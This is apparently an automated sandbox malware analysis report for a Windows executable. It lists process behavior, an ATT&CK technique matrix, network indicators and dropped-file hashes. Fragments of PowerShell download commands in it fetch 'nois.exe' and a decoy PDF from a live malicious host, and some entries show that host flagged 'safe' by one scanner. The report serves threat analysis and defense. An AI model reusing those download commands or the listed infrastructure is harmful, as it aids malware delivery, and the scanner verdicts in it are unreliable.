Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
PowerShell
1
DLL Side-Loading
11
Process Injection
11
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570132 Sample: lg1wwLsmCX.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 52 34 badlarrysguitars.com 2->34 36 x1.i.lencr.org 2->36 38 bg.microsoft.map.fastly.net 2->38 44 Machine Learning detection for sample 2->44 46 AI detected suspicious sample 2->46 10 lg1wwLsmCX.exe 2->10         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 48 Suspicious powershell command line found 10->48 16 powershell.exe 17 20 10->16         started        19 powershell.exe 16 10->19         started        40 127.0.0.1 unknown unknown 13->40 signatures6 process7 dnsIp8 32 badlarrysguitars.com 101.99.75.174, 443, 49709, 49806 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 16->32 21 Acrobat.exe 73 16->21         started        23 conhost.exe 16->23         started        25 conhost.exe 19->25         started        process9 process10 27 AcroCEF.exe 109 21->27         started        process11 29 AcroCEF.exe 6 27->29         started        dnsIp12 42 54.224.241.105, 443, 49748 AMAZON-AESUS United States 29->42

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
lg1wwLsmCX.exe8%ReversingLabs
lg1wwLsmCX.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://www.microsoft.co0%Avira URL Cloudsafe
https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path(0%Avira URL Cloudsafe
https://badlarrysguitars.comp0%Avira URL Cloudsafe
http://badlarrysguitars.com0%Avira URL Cloudsafe
https://www.adobe.co0%Avira URL Cloudsafe
https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path(0%Avira URL Cloudsafe
https://badlarrysguitars.com0%Avira URL Cloudsafe
http://crl.micronW0%Avira URL Cloudsafe
https://badlarrysguitars.com/share/alert.pdf0%Avira URL Cloudsafe
https://badlarrysguitars.com/private/nois.exe0%Avira URL Cloudsafe
https://badlarrysguitars.com/pri0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    badlarrysguitars.com
    101.99.75.174
    truetrue
      unknown
      x1.i.lencr.org
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://badlarrysguitars.com/share/alert.pdftrue
        • Avira URL Cloud: safe
        unknown
        https://badlarrysguitars.com/private/nois.exetrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1661276426.000001FDC3323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1661276426.000001FDC3466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1646173609.000001FDB4CB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828727225.000002B3125E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.8.drfalse
            high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.1781877654.000002B3027A2000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.1781877654.000002B3027A2000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://badlarrysguitars.comppowershell.exe, 00000005.00000002.1646173609.000001FDB4444000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://go.micropowershell.exe, 00000005.00000002.1646173609.000001FDB4444000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B3036FF000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.microsoft.copowershell.exe, 00000005.00000002.1665556842.000001FDCB4E0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Iconpowershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://crl.ver)svchost.exe, 00000009.00000002.3011261258.0000028FC0A00000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path(powershell.exe, 00000010.00000002.1780240680.000002B300650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781632613.000002B3009A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781527537.000002B300900000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1840770157.000002B31B0F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1780240680.000002B3006E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1842632807.000002BB1BE2A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path(powershell.exe, 00000005.00000002.1645720630.000001FDB14C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1645586241.000001FDB13E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1645545243.000001FDB1370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1665596061.000001FDCB66C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1646033280.000001FDB15D0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.1781877654.000002B3027A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://crl.micronWpowershell.exe, 00000005.00000002.1665596061.000001FDCB66C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://badlarrysguitars.compowershell.exe, 00000005.00000002.1646173609.000001FDB4444000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B3036FF000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          https://www.adobe.coReaderMessages.7.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://badlarrysguitars.compowershell.exe, 00000005.00000002.1646173609.000001FDB4BDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B303E97000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://badlarrysguitars.com/pripowershell.exe, 00000010.00000002.1781877654.000002B303EC4000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          https://g.live.com/odclientsettings/Prod-C:edb.log.9.dr, qmgr.db.9.drfalse
                            high
                            https://contoso.com/powershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000009.00000003.1360100090.0000028FC0C50000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drfalse
                                high
                                https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1661276426.000001FDC3323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1661276426.000001FDC3466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1646173609.000001FDB4CB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828727225.000002B3125E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://aka.ms/pscore68powershell.exe, 00000005.00000002.1646173609.000001FDB32B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B302571000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1646173609.000001FDB32B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B302571000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      54.224.241.105
                                      unknownUnited States
                                      14618AMAZON-AESUSfalse
                                      101.99.75.174
                                      badlarrysguitars.comMalaysia
                                      45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYtrue
                                      IP
                                      127.0.0.1
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1570132
                                      Start date and time:2024-12-06 15:52:01 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 23s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Run name:Run with higher sleep bypass
                                      Number of analysed new started processes analysed:21
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:lg1wwLsmCX.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:aa278fedf75ca629997113488d789e91f73a275575c22194c7bf7d59b30c9bc9.exe
                                      Detection:MAL
                                      Classification:mal52.winEXE@23/48@2/3
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 89%
                                      • Number of executed functions: 7
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 23.218.208.137, 172.64.41.3, 162.159.61.3, 184.30.24.109, 52.22.41.97, 3.219.243.226, 3.233.129.217, 52.6.155.20, 23.195.39.65, 199.232.214.172, 23.193.114.34, 23.193.114.8, 2.20.40.170, 2.20.68.210, 2.20.68.201, 2.16.158.145, 2.16.158.113, 2.19.126.149, 2.19.126.143
                                      • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                      • Execution Graph export aborted for target lg1wwLsmCX.exe, PID 7712 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 7740 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 9188 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: lg1wwLsmCX.exe
                                      No simulations
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      54.224.241.105https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                        invoice-1664809283.pdfGet hashmaliciousUnknownBrowse
                                          phish_alert_sp2_2.0.0.0 - 2024-08-06T131440.708.emlGet hashmaliciousTycoon2FABrowse
                                            https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12Get hashmaliciousHTMLPhisherBrowse
                                              https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12Get hashmaliciousHTMLPhisherBrowse
                                                Gestion-IMMO juillet (4) (1).pdfGet hashmaliciousUnknownBrowse
                                                  Complete_with DocuSign_Monday-July-2024 0738 AM.pdfGet hashmaliciousUnknownBrowse
                                                    [SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.emlGet hashmaliciousUnknownBrowse
                                                      Scanner_SKME092878673568739809289728639802765768729809208.pdfGet hashmaliciousUnknownBrowse
                                                        https://acrobat.adobe.com/id/urn:aaid:sc:eu:ee698a8c-0f5f-4d49-8e57-941bebba7ea3Get hashmaliciousHTMLPhisherBrowse
                                                          101.99.75.174IFhqcKaIol.lnkGet hashmaliciousUnknownBrowse
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            badlarrysguitars.comIFhqcKaIol.lnkGet hashmaliciousUnknownBrowse
                                                            • 101.99.75.174
                                                            bg.microsoft.map.fastly.netfile.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 199.232.210.172
                                                            IFhqcKaIol.lnkGet hashmaliciousUnknownBrowse
                                                            • 199.232.214.172
                                                            17334905466c073176eadfc4a4d1af620c5aa97d12d1156570ede93d276f9fa6d51fffb6c5778.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                            • 199.232.210.172
                                                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                            • 199.232.210.172
                                                            1733479268d0423578683b481c87d2b90a74213612e8837faf7f066c8e81ec92f9b2658c65965.dat-decoded.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                            • 199.232.210.172
                                                            1733479274b6398afce8a86557af12b8f232b1cc4638f7df1d6de31554c2e013c23277a5b9785.dat-decoded.exeGet hashmaliciousPureCrypterBrowse
                                                            • 199.232.214.172
                                                            mjf2ERXdI5.exeGet hashmaliciousUnknownBrowse
                                                            • 199.232.210.172
                                                            16547.jsGet hashmaliciousMassLogger RATBrowse
                                                            • 199.232.214.172
                                                            Scan_03774843.pdfGet hashmaliciousUnknownBrowse
                                                            • 199.232.210.172
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYIFhqcKaIol.lnkGet hashmaliciousUnknownBrowse
                                                            • 101.99.75.174
                                                            Scan_03774843.pdfGet hashmaliciousUnknownBrowse
                                                            • 101.99.77.51
                                                            https://oyatsu-jikan.org/#Z2FyeXRocm93JG5hdGlvbmFsdHViZXN1cHBseS5jb20=Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                            • 101.99.88.67
                                                            442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                            • 111.90.147.125
                                                            442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                            • 111.90.147.125
                                                            442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                            • 111.90.147.125
                                                            442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                            • 111.90.147.125
                                                            Vendor Agreement Ready for Your Signature November 22 2024 at 084923 PM.msgGet hashmaliciousHTMLPhisherBrowse
                                                            • 101.99.75.104
                                                            http://amz-account-unlock-dashboard4.duckdns.orgGet hashmaliciousUnknownBrowse
                                                            • 111.90.149.151
                                                            AMAZON-AESUShttps://dsbemcm.r.us-east-1.awstrack.me/L0/https:%2F%2Fmondialrelay-fr.pdfing.ai%2F/1/0100019399661370-1ce77c65-1b81-4233-8a20-5a39fd0f0317-000000/J1Yr9vKfHbZhazSj6gj8UC7ow80=403Get hashmaliciousUnknownBrowse
                                                            • 3.232.156.127
                                                            IFhqcKaIol.lnkGet hashmaliciousUnknownBrowse
                                                            • 3.219.243.226
                                                            jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                            • 44.221.131.20
                                                            file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 44.196.3.45
                                                            jew.mips.elfGet hashmaliciousUnknownBrowse
                                                            • 54.42.218.193
                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                            • 44.196.3.45
                                                            https://us-api.mimecast.com.kb4.io/XWko4Q0hGOG85d2pSNGFBUW1UaEJSL09QUThzR2hrYWl3UGh4aEFVNkQ0dW1jU0FrdnhwRFB2clh1VmRINlRhSTJXNkM0N2NiS0J6WWlVRENjUVlPSWZYbk9xUkNaRDNGSjR3OU1Jd2RSdlJKL0k2cjZWV0ozK1BLRWRrZWJucElFUGVXcFpkM2hlOXluYlErY01WYkRnNmtzUldXNlJEcmIvN0Z0WVNMOHNobW5lMjVGcEdENDA0TWZNblZTWFVuRUp3PS0taC91cHJQRm5XdmFVejBTdC0tWVNTU2ZrYnF5clZ0ZndVU0tiNHIzUT09?cid=2313358952Get hashmaliciousKnowBe4Browse
                                                            • 54.85.18.81
                                                            file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 34.224.200.202
                                                            https://i.postimg.cc/y6hBTtv7/png-Hand-SAward.pngGet hashmaliciousHTMLPhisherBrowse
                                                            • 54.224.154.88
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0eljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                            • 101.99.75.174
                                                            kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                            • 101.99.75.174
                                                            kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                            • 101.99.75.174
                                                            kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                            • 101.99.75.174
                                                            980001672 PPR for 30887217.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 101.99.75.174
                                                            y1rS62yprs.exeGet hashmaliciousBabadedaBrowse
                                                            • 101.99.75.174
                                                            IFhqcKaIol.lnkGet hashmaliciousUnknownBrowse
                                                            • 101.99.75.174
                                                            JSWunwO4rS.lnkGet hashmaliciousLummaC StealerBrowse
                                                            • 101.99.75.174
                                                            7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                            • 101.99.75.174
                                                            No context
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):8192
                                                            Entropy (8bit):0.35999246155449205
                                                            Encrypted:false
                                                            SSDEEP:6:6xpoaaD0JOCEfMuaaD0JOCEfMKQmDaxpoaaD0JOCEfMuaaD0JOCEfMKQmD:7aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                            MD5:54D24A9E5B26A574BA88CC61575C44B3
                                                            SHA1:A7BBFB0021907F5A1C0495798440344743155DA8
                                                            SHA-256:502373EC6695657DE5CE332F59FD5E091570CFA5807C961F7EDD11805277F5D6
                                                            SHA-512:16B23BF128E761E1B68F0C62D678E0FEAB634F3ADB2BA3DB7B22DA7753A90C059E13F744F1787A602AC443A72402BED9BA657CF4000EEF351649C9A5F02BF986
                                                            Malicious:false
                                                            Preview:*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1310720
                                                            Entropy (8bit):0.8847323213368606
                                                            Encrypted:false
                                                            SSDEEP:1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG9o:0J7adfWuK0p/QDfKoPeuP0aN4fqoxP
                                                            MD5:ECFC47EB4F9CD79CCB464DA8C1B02BD6
                                                            SHA1:4E47278A804120CF56B45C0FED7857E56D31210C
                                                            SHA-256:9FCA5E8D68C5A30BC169EA2189D8E3A27E05E50A26D1CC494CAECB4CAD10DF89
                                                            SHA-512:CEC4794603B6C413188C4D0F350893D31BD08817DE8424FDA5592B6CD344BEBEEEF71F52E6223F4645BA86FD84F3B2BD5663BDAC206F1D0FF40001E4683431BC
                                                            Malicious:false
                                                            Preview:2.e.........@..@12...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................K<...kS..#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x12b1c712, page size 16384, Windows version 10.0
                                                            Category:dropped
                                                            Size (bytes):1310720
                                                            Entropy (8bit):0.6555055419351438
                                                            Encrypted:false
                                                            SSDEEP:1536:RSB2ESB2SSjlK/2VT9Dr1k0aXjJ8VQCYkr3g1652UPkLk+kAv/gKr51KrSSfSDZ5:RazaAVVL4y2UC
                                                            MD5:AD27C98119AD60144298A41292ACC85A
                                                            SHA1:00735CD5B02C0C5B4B335725833C9A90EFDF6076
                                                            SHA-256:2AF1E0541E093C265315A0589D47CDA8630F9C85545AB48D44D3FB79A32DB64C
                                                            SHA-512:116FD81E5DDE7CA8299040F61B20AC44A26662548B75A8CF22CAAB3D4FC3EEDF306E05671EFBD910C671279AF34ED53D9DDD6322B8C1BA71EE68963DDA2936B0
                                                            Malicious:false
                                                            Preview:....... ...............X\...;...{......................0........7...|...5...|5.h........7...|..0...........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................P0..7...|.8.................$...7...|...........................#......0.......................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:OpenPGP Public Key
                                                            Category:dropped
                                                            Size (bytes):16384
                                                            Entropy (8bit):0.08064424977913105
                                                            Encrypted:false
                                                            SSDEEP:3:b3yXUetYeRWrjpKlj2ZQvK3SnwXlUYZQlqllwiTGtlZPz0ll:TQzRsjpKd2KcXSrQWiCpPQ
                                                            MD5:5C9B482BDE6D56AA7519E5A8A5716732
                                                            SHA1:6793F0F5184B6588747AF0D4E9E5FED9811DD5B6
                                                            SHA-256:05B90D717B5D36F0BC781BDCF0502C75189E02A3F97D071E4B90412261FB47BF
                                                            SHA-512:2FF2D3A1285ED58C1B74DB5EDAE33A30A0F4C81BB6A74265CF2E7F94BB25D68EAE85C10ECADA2DE7B41C0C772063156BCC6097A05D3CC3C28D56C32AC568C0C9
                                                            Malicious:false
